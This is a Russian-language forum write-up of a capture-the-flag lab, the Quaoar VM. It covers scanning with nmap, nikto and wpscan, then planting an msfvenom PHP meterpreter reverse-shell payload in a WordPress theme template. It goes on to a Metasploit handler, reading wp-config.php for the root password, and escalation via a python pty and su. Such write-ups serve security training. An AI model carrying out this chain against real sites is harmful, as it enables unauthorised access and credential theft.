CTF CTF. Hack the Quaoar VM

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Всем привет, эта статья, будет посвящена соревнованиям в рамках CTF. На этот раз мы будем искать флаги и уязвимости в системе Quaoar VM.

upload_2017-5-11_22-41-7.png


Скачиваем систему отсюда -

Монтируем в Oracle VBox или куда удобно и приступаем к сканированию.

> nmap –sV 172.16.0.178

upload_2017-5-11_22-41-28.png


Видим, что имеется запущенный веб сервер, просканируем его с помощью nikto:

> nikto – h 172.16.0.178


upload_2017-5-11_22-41-52.png


Итогом будет обнаружение файла robots.txt

upload_2017-5-11_22-42-24.png

robots.txt - это файл, который находится в корне сайта. В нём записываются инструкции для поисковых роботов. Эти инструкции могут запрещать к индексации некоторые разделы или страницы на сайте, указывать на правильное «зеркалирование» домена, рекомендовать поисковому роботу соблюдать определенный временной интервал между скачиванием документов с сервера и т.д.

Так же, есть доступная для нас директория wordpress, соответственно есть административная панель:

upload_2017-5-11_22-42-38.png


С помощью wpscan, попробуем получить список пользователей:

> wpscan –url -- enumerate u

upload_2017-5-11_22-43-3.png


В результате получаем учетные данные от административной панели:

upload_2017-5-11_22-43-23.png


Следующим шагом будет получение сессии meterpreter с уязвимого хоста, делать будем это с помощью учетной записи Администратора, выполнив, вредоносный php код в редакторе тем. Для начала, создадим код полезной нагрузки с помощью msfvenom:

> msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.0.172 lport=4444 -f raw

upload_2017-5-11_22-44-2.png


Полученный код копируем от <?php до die(); затем вставляем его в шаблон и сохраняем, как показано на скриншоте ниже. В качестве изменяемого шаблона был выбран 404 Template.

upload_2017-5-11_22-44-35.png


Сохраняем изменения.

Запускаем Metasploit и вводим следующие команды:

> use exploit/multi/handler

> set payload php/meterpreter/reverse_tcp

> set lhost 172.16.0.172

> set lport 4444

> exploit

Открываем путь к вредоносному шаблону в браузере как показано на скриншоте ниже:

upload_2017-5-11_22-45-14.png


Результатом будет открытая сессия meterpreter:

upload_2017-5-11_22-45-27.png


Так как первая цель получить shell, то мы ее достигли. Немного побродив по серверу, в папке /home/wpadmin/ обнаруживается файл flag.txt.

upload_2017-5-11_22-45-47.png


А если заглянуть в /var/www/wordpress/wp-config.php, то с большой вероятностью можно сказать, что мы нашли пароль root:

> cat /var/www/wordpress/wp-config.php

upload_2017-5-11_22-46-11.png


Попробуем стать root:

> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/aaa.py (
Команда позволит создать в указанной папке скрипт, который даст нам доступ к pty)

> python /tmp/aaa.py

Выполненные команды позволили нам войти в терминал.

> su
(Вводим пароль root)

upload_2017-5-11_22-47-4.png


Перейдя в корневую директорию, находим второй флаг:

upload_2017-5-11_22-47-19.png


Третий и последний флаг (хотя, в принципе, цели достигнуты) находится в /etc/cron.d/php5:

> cat /etc/cron.d/php5

upload_2017-5-11_22-47-36.png


На этом прохождение Quaoar VM можно считать завершенным. Спасибо за внимание.
 
A

a113

Интересно, а можно ли попробовать "прощупать" на уязвимость path-traversal и таким образом найти flag.txt? :)
 
  • Нравится
Реакции: Vander
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!